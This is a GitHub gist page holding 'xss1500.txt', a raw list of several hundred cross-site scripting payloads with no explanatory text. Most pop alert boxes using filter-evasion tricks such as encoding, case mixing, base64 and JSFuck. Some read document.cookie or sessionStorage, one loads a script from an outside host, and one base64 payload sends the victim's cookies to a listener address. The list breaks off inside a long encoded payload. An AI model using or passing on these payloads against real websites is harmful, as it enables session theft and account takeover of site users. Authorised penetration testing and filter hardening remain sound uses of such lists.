Skip to content

Instantly share code, notes, and snippets.

@PushkraJ99

PushkraJ99/xss1500.txt

Forked from MU2324/xss1500.txt
Created August 15, 2024 11:05
Show Gist options
  • Save PushkraJ99/920076ae292177eae48d89eb86b8ea64 to your computer and use it in GitHub Desktop.
Save PushkraJ99/920076ae292177eae48d89eb86b8ea64 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
xss1500.txt
#<script>alert(1)</script>
1%22onfocus=%27window.alert%28document.cookie%29%27%20autofocus=
"><form onformdata%3Dwindow.confirm(cookie)><button>XSS here<!--
#javascript:alert(2);
"><svg onload=alert(1)>
[email protected]%27\%22%3E%3Csvg/onload=alert(/xss/)%3E
[email protected]%2527%5C%2522%253E%253Csvg%2Fonload%3Dalert%28%2Fxss%2F%29%253E
//?aspxerrorpath=<script>alert(1)</script>
嘼嘾img%20src%3Dx%20onerror%3Dprompt%28document.domain%29%3B%3E
alert##<script>prompt(1234)</script>
<ScripT>alert(1234)</ScRipT>
/<script>alert(1234)</script>
<DIV+STYLE="background-image: url(javascript:alert(1))">
<IMG+DYNSRC="javascript:alert(1);">
IMG+LOWSRC="javascript:alert(1);">
<img src=asdf onerror=alert(JSON.stringify(sessionStorage))>
<iframe src="javascript:alert(document.domain)"></iframe>
/me/m%3C/script%3E%3Csvg/onload=prompt(document.domain)%3E
<isindex+type=image+src=1+onerror=alert(1)>
<img src=x onerror="alert(origin)">
"*alert(1)*"
ibro"*alert(1)*"
alert?.(1)
<script>eval('al'+'ert(1)');</script>
'alert(1)'.replace(/.+/,eval)
<img src/onerror=alert(1)>
<img onfocus=alert(1) autofocus tabindex=1>
<p onfocus=alert(1) autofocus tabindex=1>
<form onfocus=alert(1) autofocus tabindex=1>
<svg onfocus=alert(1) autofocus tabindex=1>
<wbr onfocus=alert(1) autofocus tabindex=1>
<hgroup onfocus=alert(1) autofocus tabindex=1>
<ul onfocus=alert(1) autofocus tabindex=1>
<video onfocus=alert(1) autofocus tabindex=1>
<mark onfocus=alert(1) autofocus tabindex=1>
<h1 onfocus=alert(1) autofocus tabindex=1>
<xss onfocus=alert(1) autofocus tabindex=1>
<body onhashchange="print()">
<plaintext onfocus=alert(1) autofocus tabindex=1>
<video controls src=1 onfocus=alert(1) autofocus>
<svg><image href=1 onerror=alert(1)>
<audio src/onerror=alert(1)>
<ol onfocus=alert(1) autofocus tabindex=1>
<image2 onfocus=alert(1) autofocus tabindex=1>
alert(document['cookie'])
<svg/onload=parent[/al/.source+/ert/.source] (1)>
<svg/onload=parent[/al/.source.concat(/ert/.source)] (2)>
"><img src=x onafterprint=prompt(document.domain);>
<img onerror=eval('al&#x5c;u0065rt(1)') src=a>
"><div onpointerrawupdate="console.log('XSS')">Click_Here_Click_Here_Click_Here_Click_Here_Click_Here_Click_Here_Click_Here_ClickHere</div>
"><div onpointerrawupdate="console.log('XSS')"></div><!--
<video onloadstart=alert()><source></*>
<xss draggable="true" ondragexit-alert()>test</xss>
(A(%22onerror='alert%60123%60'test))/
"aaa&#x3C;a href=javas&#x26;#99;ript:alert(1)&#x3E;click"
"><form onformdata=window.confirm(document.cookie)><!--
a'-alert(1)//
';document.addEventListener('DOMContentLoaded', function(){var c = function(){a();};var s = document.createElement('script');s.src = 'https://n.0x7359.com/xss.js';s.onreadystatechange = c;document.body.appendChild(s);});//
';alert(document.cookie)//
<svg/onload​=alert/*1337*/(1)>
<svg/onload​=alert//&NewLine;(2)>
<svg/onload​=alert&sol;**&sol;(3)>
<svg/onload​=alert/&#42;&#42;/(4)>
<svg/onload​=alert&#x2F;**&#47;(5)>
confirm?.(1)
ignition/scripts/--><svg%20onload=alert%28document.domain%29>
<svg%20onload=alert%28document.domain%29>
<script ~~~>alert(0%0)</script ~~~>
"ontouchend%3Dprompt%281%29+class%3Dd3rk+
"><svg onScroll="javascript:alert(1)//
"<!--><Svg OnLoad=confirm?.(/d3rk😈/)<!--1")"<!--><Svg+OnLoad=confirm?.(/d3rk😈/)<!--
%22%3C!--%3E%3CSvg%20OnLoad=confirm?.(/d3rk%F0%9F%98%88/)%3C!--1%22%29%22%3C%21--%3E%3CSvg+OnLoad%3Dconfirm%3f%2e%28%2fd3rk%F0%9F%98%88%2f%29%3C%21--
url=%26%2302java%26%23115cript:alert(document.domain)
%26%2302java%26%23115cript:alert(document.domain)
">>>>>><marquee>RXSS</marquee></head><abc%3E</script><script>alert(document.cookie)</script><meta
“><iMg SrC=x onError​=prompt()>
"><​script>prompt()<​/script>
<Svg On Only=1 Onload=alert("hex")>
"><script>alert(document.cookie)</script>
<<​script>script>prompt()<​/script>
<svg/onload​=prompt()>
<Svg On Only=1 Onload=alert(1)>
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=&#x0000000000061;lert&#x000000028;origin&#x000029;>
<IFRAME SRC="javascript:alert(document.cookie);"></IFRAME>
<!</textarea <body onload='alert(1)'>
<INPUT+TYPE="IMAGE"+SRC="javascript:alert(1);">
themecolor=%22-alert('XSS')-%22
<STYLE>li+{list-style-image:url("javascript:alert(1)");}</STYLE><UL><LI>
"><a>a</a><img src=x onerror=alert(document.cookie)>{{9-9}}';alert(0);://
#'%26%26'javascript:alert%25281%2529//
</a onmousemove="alert(1)">
<svg onload=alert (1337)&nvgt;
<img/src/onerror="(function(x){this[x+`ert`](1)})`al`">
<img/src/onerror="window[`al+/e/[`ex + `ec`]`e`+`rt`](2)">
<img/src/onerror="this.ownerDocument.defaultView['\u0061lert'](4)">
<iframe src-doc="<svg onload=alert (1337)&nvgt;"></iframe>
&#60;body onload=alert('ibrahimxss')&#62;&#34;&#34;
onpointerover=”alert(‘XSS’)
jAvaScripT:(alert)`1`
javascript:alert('1')
"onpointerover=”alert(‘XSS’)
10</option></select><img/src=xon=()onx+honerror=alert(1)>ss<svg/onload=prompt(document.domain)%20>
<img/src=xon=()onx+honerror=alert(1)>ss<svg/onload=prompt(document.domain)%20>
onclick=”alert(‘XSS’)
onmouseover=”alert(‘XSS’)
onload=”alert(‘XSS’)
onerror=”alert(‘XSS’)
onfocus=”alert(‘XSS’)
onblur=”alert(‘XSS’)
onchange=”alert(‘XSS’)
oninput=”alert(‘XSS’)
onsubmit=”alert(‘XSS’)
onkeydown=”alert(‘XSS’)
onkeydown=”alert(‘XSS’)
onpointerover=”alert(‘XSS’)
<img src=x:alert(alt) onerror=eval(src) alt=0>
<img src=/ onerror=alert(1)>
3Cscript%3Ealert(1)%3C%2Fscript%3E##1
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
//";alert(String.fromCharCode(88,83,83))
<svg onload=prompt&#0000000040document.domain)>"
%";eval(unescape(location))//#%0Aprompt(0)
<SCRIPT>a=/XSS/%0Aalert(a.source)</SCRIPT
"><script&#x00000003B;alert&#x000000028;1&#x000000029;&#x00000003B;</script>
javascript&#x00000003A;alert&#x000000028;2&#x000000029;&#x00000003B;
"><img src=1 onerror=alert&#x000000028;1&#x000000029;&#x00000003B;">
";eval(unescape(location))//# %0Aalert(0)
¼script¾alert(¢XSS¢)¼/script¾
<img src=1 onerror=alert(1)>
&#x3C;img src=1 onerror=alert(1)&#x3E;
%2527%253E%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E
%2527%2520onfocus%253D%2527alert%25281%2529%2527%2520
‘ onfocus=’alert(1)’
‘ onfocus=’alert(1)’ autofocus=’
%2527%2520onfocus%253D%2527alert%25281%2529%2527%2520autofocus%253D%2527
‘ onmouseover=’alert(1)’
%2527%2520onmouseover%253D%2527alert%25281%2529%2527%2520
<svg%20oNinad=1%20onload=alert(document.cookie)>
?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e
<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *>
”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/>
<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a>
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
<script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";http://a.click();</script>
%script%alert(CXSS¢)4/script%
<DIV STYLE="background-image: url(&#1,javascript:alert('XSS))">
STYLE="xss:expr/*XSS*/ession(alert('XSS')">
<XSS STYLE="Xss:expressionfalert('XSS'))">
xss:&#101;x&#x2F; *XSS*//*//pression(alert("XSS"))'>
"<svg onload=alert (1)> " ;
%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E
#<img src=1 onerror=alert(1)>
<a/href=javascript&colon;alert()>click
<body onload="eval(atob('YWxlcnQoJ1N1Y2Nlc3NmdWwgWFNTJyk='))">
<a href="javascript&#0000058&#0000097lert('Successful XSS')">Click this link!</a>
<iframe src=# onmouseover=alert(String.fromCharCode(88,83,83))></iframe>
<img src="java script:al ert('Successful XSS')">
<img src="java script:al ert('Successful XSS')">
<a href=" &#x8; &#23; javascript:alert('Successful XSS')">Click this link!</a>
<scr<script>ipt>document.write("Successful XSS")</scr<script>ipt>
<img/src="funny.jpg"onload=javascript:eval(alert('Successful&#32XSS'))>
<a href='vbscript:MsgBox("Successful XSS")'>Click here</a>
<img dynsrc="javascript:alert('Successful XSS')">
<img src=`javascript:alert("The name is 'XSS'")`>
<body background="javascript:alert('Successful XSS')">
"><input autofocus onfocus =top[(584390752*16).toString(32-1*2)](/XSS/)>
'onfocus='alert(1)' autofocus='
<xml onreadystatechange=alert(1)>
&fileName=')},1000);alert("XSS`);//
fileName=')},1000);alert("XSS`);//
<style onreadystatechange=alert(1)>
<script onreadystatechange=alert(1)>
<bgsound onpropertychange=alert(1)>
<body onactivate=alert(1)>
<body onfocusin=alert(1)>
<div style="background-image:url(javascript:alert('Successful XSS'))">
<input type="image" src="javascript:alert('Successful XSS')">
%26%23x2f%3B%26%23x2f%3Br4y.pw
<a/href=&#74;ava%0a%0d%09script&colon;alert()>click
<d3v/onauxclick=(((confirm)))``>click
"/><iMg SrC="x" oNeRRor="alert(document.cookie);">
svg/onload=alert(document.cookie)[email protected]
<img src="non-existent-image.jpg" onerror="alert(document.cookie);" />
[alert][0].call(this,1)
&lt;script&gt;alert(1)&lt;/script&gt;
%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B
&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;
%26amp%3Blt%3Bscript%26amp%3Bgt%3Balert%281%29%26amp%3Blt%3B%2Fscript%26amp%3Bgt%3B
<d3v/onmouseleave=[2].some(confirm)>click
<details/open/ontoggle=alert()>
<details/open/ontoggle=(confirm)()//
";[][“\146\151\154\164\145\162”][“\143\157\156\163\164\162\165\143\164\157\162”](“\145\166\141\154\50\141\164\157\142\50\42\131\127\170\154\143\156\121\157\115\123\153\75\42\51\51”)();var+test="
”al”;b=”ert”;self[a+b]();
a=”Fun”;b=”ction”;c=”ev”;d=”al(a”;e=”tob”;f=”(‘YWxlcnQoMSk=’))”;self[a+b](c+d+e+f)();
"><svg%20onload=alert%26%230000000040"1")>
<img/src=x onError="`${x}`;alert(`XSS`);">
-top['al\x65rt']('xss')-
<svg/on%20onload=alert(1)>
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0:2(1)',3,3,'javascript||alert'.split('|'),0,{}))
_0x68087f:alert(0x1);
/?xss=500); alert(document.cookie);//
data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
"></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
"><iframe src="javascript:alert(XSS)">
<object data="javascript:alert(XSS)">
<isindex type=image src=1 onerror=alert(XSS)>
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<BASE HREF="javascript:alert('XSS');//">
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<?php echo('<SCR'); echo('IPT>alert("XSS")</SCRIPT>'); ?>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
/\<script((\\s+\\w+(\\s\*=\\s\*(?:"(.)\*?"|'(.)\*?'|\[^'"\>\\s\]+))?)+\\s\*|\\s\*)src/i
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<img onload="eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))">
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
"><img src=1 onmouseleave=print()>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%28%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%2B%5B%21%5B%5D%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%2B%28%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%29%29%5B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%2B%5B%5D%29%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%5B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%28%2B%5B%5D%29%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%5D%28%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%29%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%29%28%29%28%28%5B%5D%5B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%21%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%28%29%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%2B%28%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%29%29%5B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%2B%5B%5D%29%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5